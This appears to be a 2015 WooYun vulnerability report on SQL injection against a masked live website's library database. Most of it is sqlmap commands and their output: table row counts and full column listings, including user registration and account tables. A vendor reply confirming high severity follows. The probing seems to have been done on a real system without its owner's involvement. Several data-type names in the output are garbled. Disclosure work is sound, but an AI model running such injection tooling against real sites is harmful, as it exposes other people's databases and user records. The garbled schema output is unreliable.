| dbo.tUserOrder_downloadCount |
| dbo.tUserOrder_updateCriter |
| dbo.tUserRegister |
| dbo.tUserRegister_cCode |
| dbo.tUserRegister_child |
| dbo.usa_a |
| dbo.usa_p |
+--------------------------------------------------+
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables --count
[20:13:57] [INFO] resumed: 98698
[20:13:57] [INFO] resumed: 183205
[20:13:57] [INFO] resumed: 98525
[20:13:57] [INFO] resumed: 674915
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 2843
[20:13:57] [INFO] resumed: 6781
[20:13:57] [INFO] resumed: 14720
[20:13:57] [INFO] resumed: 34599
[20:15:24] [INFO] resumed: 24097
[20:15:24] [INFO] resumed: 1072530
[20:15:24] [INFO] resumed: 90426
[20:15:24] [INFO] resumed: 1074079
[20:15:24] [INFO] resumed: 1074450
[20:15:24] [INFO] resumed: 207466
[20:15:24] [INFO] resumed: 16993
[20:15:24] [INFO] resumed: 5755
[20:15:24] [INFO] resumed: 2954
[20:15:24] [INFO] resumed: 11597
[20:15:25] [INFO] resumed: 3832
[20:15:25] [INFO] resumed: 3916
[20:15:25] [INFO] resumed: 13194
[20:15:25] [INFO] resumed: 3800
[20:15:25] [INFO] resumed: 3916
[20:15:25] [INFO] resumed: 8085
[20:15:25] [INFO] resumed: 1838
[20:15:25] [INFO] resumed: 16999
[20:15:25] [INFO] resumed: 3211
[20:15:25] [INFO] resumed: 18874
sqlmap.py -u "http://**.**.**.**/cb/QS_detail.asp?iAutoID=261" --tables --columns
Database: eLibrary
Table: dbo.syssegments
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| name | varcgar |
| segment | ims |
| status | imt |
+---------+---------+
Database: eLibrary
Table: dbo.OperatorRegV
[8 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| [SQL??] | varchar |
| [???] | varchar |
| [???IP] | varchar |
| [????] | datetime |
| [????] | rarchar |
| [????] | smallint |
| [??] | varchar |
| cID | varchar |
+---------+----------+
Database: eLibrary
Table: dbo.ESCOMTree602
[52 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCode1 | varchar |
| cCode2 | varchar |
| cCode3 | varchar |
| cCode4 | varchar |
| cCodeS | varchar |
| cFULName | varchar |
| cGLName | varchar |
| cMemo | varchar |
| cName | varchar |
| cRef1 | varchar |
| cRef2 | varchar |
| cRef3 | varchar |
| cRef4 | varchar |
| dCDate | datetime |
| dUDate | datetime |
| iAutoID | int |
| iCode1 | smallint |
| iCode10 | smallint |
| iCode2 | smallint |
| iCode3 | smallint |
| iCode4 | smallint |
| iCode5 | smallint |
| iCode6 | smallint |
| iCode7 | smallint |
| iCode8 | smallint |
| iCode9 | smallint |
| iID | int |
| iID1 | int |
| iID2 | int |
| iID3 | int |
| iID4 | int |
| iID5 | int |
| iID6 | int |
| iID7 | int |
| iID8 | int |
| iLevel | smallint |
| iParent1 | int |
| iParent10 | int |
| iParent2 | int |
| iParent3 | int |
| iParent4 | int |
| iParent5 | int |
| iParent6 | int |
| iParent7 | int |
| iParent8 | int |
| iParent9 | int |
| iTerminal | smallint |
| yAm1 | money |
| yAm2 | money |
| yAm3 | money |
| yAm4 | money |
+-----------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total
[6 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bzh | varchar |
| bzm | varchar |
| cks | varchar |
| dys | varchar |
| id | decimal |
| zhrq | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.Criter_oldCriter_split
[2 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| CriterNum | rarcdar |
| OldCriter | rarcdar |
+-----------+---------+
Database: eLibrary
Table: dbo.gb2760
[6 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bz | nvarchar |
| lb | nvarchar |
| mc | nvarchar |
| ndbs | nvarchar |
| syfw | nvarchar |
| zdsyl | nvarchar |
+--------+----------+
Database: eLibrary
Table: dbo.BookSub
[5 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| cDate | varchar |
| cEmployeID | varchar |
| cPreID | varchar |
| cSet | varchar |
| iAutoID | int |
+------------+---------+
Database: eLibrary
Table: dbo.BTab015
[9 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| cCode | varchar |
| cID | varchar |
| cName | varchar |
| cNote | varchar |
| dDate | datetime |
| iAutoID | int |
| iCode | smallint |
| iStop | smallint |
| iType | smallint |
+---------+----------+
Database: eLibrary
Table: dbo.BookDetailV
[19 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| cAuthor | varchar |
| cBarCode | varchar |
| cBarMain | varchar |
| cBID103 | varchar |
| cBNa103 | varchar |
| cBNa403 | varchar |
| cBookNa | varchar |
| cCancelDate | varchar |
| cEmployeID1 | varchar |
| cEmployeID2 | varchar |
| cEmployeNa1 | varchar |
| cEmployeNa2 | varchar |
| cHowUse | varchar |
| cInDate | varchar |
| cNote | varchar |
| cOutDate | varchar |
| cPreID | varchar |
| cTargetDate | varchar |
| iAutoID | int |
+-------------+---------+
Database: eLibrary
Table: dbo.INetLogV
[5 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| [????] | varchar |
| [????] | int |
| [????] | varchar |
| [??IP] | varchar |
| [????] | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.GetMaxBarMain
[5 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| cNote | varchar |
| cTableNa | varchar |
| dGDate | datetime |
| iAutoID | int |
| iMaxBarMain | int |
+-------------+----------+
Database: eLibrary
Table: dbo.BZ_PDF_Custom
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| dCDate | datetime |
| fileName | uarchar |
| filePath | varchar |
| iAutoID | int |
| preID | int |
+----------+----------+
Database: eLibrary
Table: dbo.Tree201
[14 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCodeFull | varchar |
| cID | varchar |
| cIDFull | varchar |
| cName | varchar |
| cNameFull | varchar |
| cNote | varchar |
| cParentID | varchar |
| dDate | datetime |
| iAutoID | int |
| iIndex | smallint |
| iLast | smallint |
| iLevel | smallint |
| iStop | smallint |
+-----------+----------+
Database: eLibrary
Table: dbo.ESCOMUnit602
[30 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCode | varchar |
| cCode1 | varchar |
| cCode2 | varchar |
| cCode3 | varchar |
| cCode4 | varchar |
| cCode_R | varchar |
| cCodeS | varchar |
| cMemo | varchar |
| cName | varchar |
| cRef1 | varchar |
| cRef2 | varchar |
| cRef3 | varchar |
| cRef4 | varchar |
| cRef5 | varchar |
| cRef6 | varchar |
| cRef7 | varchar |
| cRef8 | varchar |
| dCDate | datetime |
| dUDate | datetime |
| iAutoID | int |
| iDisabled | int |
| iID | int |
| iID1 | int |
| iID2 | int |
| iID3 | int |
| iID4 | int |
| iID5 | int |
| iID6 | int |
| iID7 | int |
| iID8 | int |
+-----------+----------+
Database: eLibrary
Table: dbo.BookHistory
[8 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| cBarCode | varchar |
| cBID103 | varchar |
| cDate | varchar |
| cEmployeID1 | varchar |
| cEmployeID2 | varchar |
| cNote | varchar |
| cPreID | varchar |
| iAutoID | int |
+-------------+---------+
Database: eLibrary
Table: dbo.ESCOMUnit602_Tree
[5 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| dDate | datetime |
| iAutoID | int |
| iID | int |
| iIDTree | int |
| iIsSet | int |
+---------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total3
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| bzh | varchar |
| id | decimal |
| zhrq | datetime |
+--------+----------+
Database: eLibrary
Table: dbo.tUserAccount_Total2
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| bzh | varchar |
| dys | varchar |
| id | decimal |
+--------+---------+
Database: eLibrary
Table: dbo.u_c
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| [??] | varchar |
| [??id] | varcdar |
| [????] | varchar |
+--------+---------+
Database: eLibrary
Table: dbo.TreeMain
[7 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cCnName | varchar |
| cNote | varchar |
| cTabName | varchar |
| dDate | datetime |
| iAutoID | int |
| iShowType | smallint |
| iSys | smallint |
+-----------+----------+
Database: eLibrary
Table: dbo.BTable_tmp
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| code | int |
| name | varchar |
+--------+---------+
Database: eLibrary
Table: dbo.ESgb2760
[7 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| bz | varchar |
| iAutoID | int |
| lb | varchar |
| mc | varchar |
| ndbs | varchar |
| syfw | varchar |
| zdsyl | varchar |
+---------+---------+
Database: eLibrary
Table: dbo.BZ_top_cache
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| cCancelDate | oarchao |
| CriterID | cecimal |
| CriterName | oarchao |
| CriterNum | oarchao |
| iAutoID | int |
| ImPleMentDate | narchan |
| InPutDate | parchar |
| iType | int |
| lastCheckTime | cateoime |
| Modiflag | varchar |
+---------------+----------+
Database: eLibrary
Table: dbo.PrintCriterV
[55 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| BackCode | varchar |
| cAuthorizNO | varchar |
| cBarcode | varchar |
| cCancelDate | varchar |
| cCriterName | varchar |
| cdeadline | varchar |
| cEnglishName | varchar |
| cGainDate | varchar |
| cGainID | varchar |
| cGainName | varchar |
| ChinaType | varchar |
| cIssueDate | varchar |
| cIssueID | varchar |
| cIssueName | varchar |
| cReclaimDate | varchar |
| cReclaimID | varchar |
| CriterID | decimal |
| CriterName | varchar |
| CriterNum | varchar |
| CriterNumber | varchar |
| EnglishName | varchar |
| EscAuthorizNO | varchar |
| EscIssueDate | varchar |
| EsfileName | varchar |
| EsiFile | int |
| EsiID | int |
| EsiNO | int |
| EsPDFExist | int |
| EsUpdate | varchar |
| iAutoID | int |
| ICsNum | varchar |
| iGainOut | int |
| iID | decimal |
| ImPleMentDate | varchar |
| IndexNum | varchar |
| InPutDate | varchar |
| InputPrDate | varchar |
| iReclaim | smallint |
| ItsNew | varchar |
| ModiFlag | varchar |
| ModifyNum | varchar |
| ModifyState | varchar |
| Money | money |
| OldCriter | varchar |
| OperDate | varchar |
| OperName | varchar |
| OperType | varchar |
| PageNum | int |
| Provider | varchar |
| Relation | varchar |
| RelationCode | varchar |
| ReMark | varchar |
| SaveNum | int |
| Type | varchar |
| YnForinCriter | varchar |
+---------------+-------

漏洞证明:

8.png


10.png


11.png

修复方案:

你们比我懂

版权声明:转载请注明来源 IceKing@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-27 15:03

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无